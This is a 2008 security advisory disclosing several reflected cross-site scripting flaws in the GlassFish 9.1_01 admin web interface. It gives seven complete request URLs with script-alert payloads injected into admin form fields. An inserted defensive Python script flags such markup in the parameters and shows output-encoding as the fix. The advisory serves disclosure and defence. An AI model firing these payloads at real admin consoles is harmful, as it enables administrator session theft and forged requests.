==============================

Multiple XSS - GlassFish Web Interface (Sun Java System Application Server 9.1_01 (build b09d-fcs))

==============================

Author: Eduardo Neves a.k.a _eth0_
Date: 14 June 2008
Site: http://webappsecurity.wordpress.com

==============================

APPLICATION : Glassfish webadmin interface
VERSION : Sun Java System Application Server 9.1_01 (build b09d-fcs)
VENDOR : http://www.sun.com
DOWNLOAD : https://glassfish.dev.java.net/

==============================

IMPACT: XSS, XSRF, etc.

Severity: Low (or not?)

==============================

Description:

This vulnerability affects several pages of the GlassFish web admin interface:
the text input fields accept malicious or unexpected input data without
neutralising it. It was found in more than ten input fields in GlassFish.

These are vulnerable URLs:

http://[HOSTNAME]:4848/resourceNode/customResourceNew.jsf?propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3AJndiNew=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AresTypeProp%3AresType=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AfactoryClassProp%3AfactoryClass=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3AhelpKey=customresourcescreate.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id276%3Aj_id282&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton

http://[HOSTNAME]:4848/resourceNode/externalResourceNew.jsf?propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3AJndiNew=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AresTypeProp%3AresType=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AfactoryClassProp%3AfactoryClass=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AjndiLookupProp%3AjndiLookup=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3ApropertyContentPage%3AhelpKey=externalresourcescreate.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id289%3Aj_id293&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton

http://[HOSTNAME]:4848/resourceNode/jmsDestinationNew.jsf?propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3AJndi=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AnameProp%3Aname=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AresTypeProp%3AresType=javax.jms.Topic&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AstatusProp%3Acb=true&propertyForm%3AbasicTable%3ArowGroup1%3A0%3Acol2%3Acol1St=Description&propertyForm%3AbasicTable%3ArowGroup1%3A0%3Acol3%3Acol1St=&propertyForm%3AhelpKey=jmsdestinationnew.html%09&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id242%3Aj_id246&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton

http://[HOSTNAME]:4848/resourceNode/jmsConnectionNew.jsf?propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet%3AgeneralPropertySheet%3AjndiProp%3AJndi=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertySheet%3AgeneralPropertySheet%3AresTypeProp%3AresType=javax.jms.TopicConnectionFactory&propertyForm%3ApropertySheet%3AgeneralPropertySheet%3AdescProp%3Acd=%3Cscript%3Ealert%28%27xss2%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertySheet%3AgeneralPropertySheet%3AstatusProp%3Asun_checkbox9=true&propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AinitSizeProp%3Ads=8&propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AmaxProp%3Ads2=32&propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AresizeProp%3Ads3=2&propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AidleProp%3Ads=300&propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AmaxWaitProp%3Ads=60000&propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3Atransprop%3Atrans=&propertyForm%3AbasicTable%3ArowGroup1%3A0%3Acol2%3Acol1St=Password&propertyForm%3AbasicTable%3ArowGroup1%3A0%3Acol3%3Acol1St=guest&propertyForm%3AbasicTable%3ArowGroup1%3A1%3Acol2%3Acol1St=UserName&propertyForm%3AbasicTable%3ArowGroup1%3A1%3Acol3%3Acol1St=guest&propertyForm%3AhelpKey=jmsconnectionnew.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id226%3Aj_id234&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%

http://[HOSTNAME]:4848/resourceNode/jdbcResourceNew.jsf?propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3Ajnditext=<script>alert('xss');</script>&propertyForm%3ApropertySheet%3ApropertSectionTextField%3ApoolNameProp%3APoolName=__CallFlowPool&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=<script>alert('xss3');</script>&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3AhelpKey=jdbcresourcenew.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id185%3Aj_id201&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton

http://[HOSTNAME]:4848/applications/lifecycleModulesNew.jsf?propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AnameProp%3Aname=<script>alert('xss');</script>&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AclassNameProp%3Aclassname=<script>alert('xss2');</script>&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3ApathProp%3AclassPath=&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AloadOrderProp%3AloadOrder=<script>alert('xss3');</script>&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AstatusProp%3Asun_checkbox8=true&propertyForm%3ApropertyContentPage%3AbottomButtons%3AsaveButton2=++OK++&propertyForm%3AhelpKey=lifecyclemodules.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id117%3Aj_id125&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AbottomButtons%3AsaveButton2

http://[HOSTNAME]:4848/resourceNode/jdbcConnectionPoolNew1.jsf?propertyForm%3ApropertyContentPage%3AtopButtons%3AnextButton=+Next+&propertyForm%3ApropertyContentPage%3ApropertySheet%3AgeneralPropertySheet%3AjndiProp%3Aname=<script>alert('xss')</script>&propertyForm%3ApropertyContentPage%3ApropertySheet%3AgeneralPropertySheet%3AresTypeProp%3AresType=<script>alert('xss2');</script>&propertyForm%3ApropertyContentPage%3ApropertySheet%3AgeneralPropertySheet%3AdbProp%3Adb=<script>alert('xss3');</script>&propertyForm%3AhelpKey=jdbcconnectionpoolnew1.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id7%3Aj_id34&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnextButton

And others =)
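As an added example that is not part of this advisory, the Python script below triages a request shaped like the URLs above from the defender's side: it decodes the JSF client ids and values out of the query string, flags the parameters whose decoded value carries markup, and shows the output-encoding fix next to the unsafe reflection. The hostname is a constructed stand-in and render_field is a hypothetical re-render of the text field, not GlassFish code.

```python
import html
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample: the advisory's customResourceNew.jsf request, trimmed
# to the parameters that matter, with a stand-in hostname (not a real host).
SAMPLE_URL = (
    "http://glassfish-admin.example.internal:4848/resourceNode/customResourceNew.jsf?"
    "propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton=++OK++"
    "&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField"
    "%3AjndiProp%3AJndiNew=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E"
    "&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField"
    "%3AdescProp%3Adesc=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E"
    "&javax.faces.ViewState=j_id276%3Aj_id282"
)

# A decoded value that opens an HTML tag or a javascript: URL is worth a look.
MARKUP = re.compile(r"<\s*/?[a-z!]|javascript:", re.IGNORECASE)


def is_admin_jsf_request(url):
    """True for a request to the GlassFish admin listener (4848) for a .jsf page."""
    parts = urlsplit(url)
    return parts.port == 4848 and parts.path.endswith(".jsf")


def flag_markup_params(url):
    """Map JSF client id -> decoded value for each query parameter that carries
    markup. parse_qsl also decodes the %3A separators, so the keys come back
    as propertyForm:propertyContentPage:... exactly as the page names them."""
    hits = {}
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if MARKUP.search(value):
            hits[name] = value
    return hits


def render_field(client_id, value, escape=True):
    """Hypothetical re-render of a submitted value back into its text field.
    escape=False reproduces the unsafe reflection; escape=True is the fix:
    HTML-encode on output so the browser sees text, not a <script> element."""
    shown = html.escape(value, quote=True) if escape else value
    return '<input type="text" id="%s" value="%s">' % (client_id, shown)


if __name__ == "__main__":
    for cid, val in flag_markup_params(SAMPLE_URL).items():
        print(cid, "->", render_field(cid, val))
```

The same flag_markup_params check can be run over the decoded query strings of admin-listener access log entries to spot which of the fields listed above are being probed.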

-- 
|_|0|_| Serrano Neves - a.k.a eth0
|_|_|0| http://webappsecurity.wordpress.com
|0|0|0| "Talk is cheap. Show me the code." - Linus Torvalds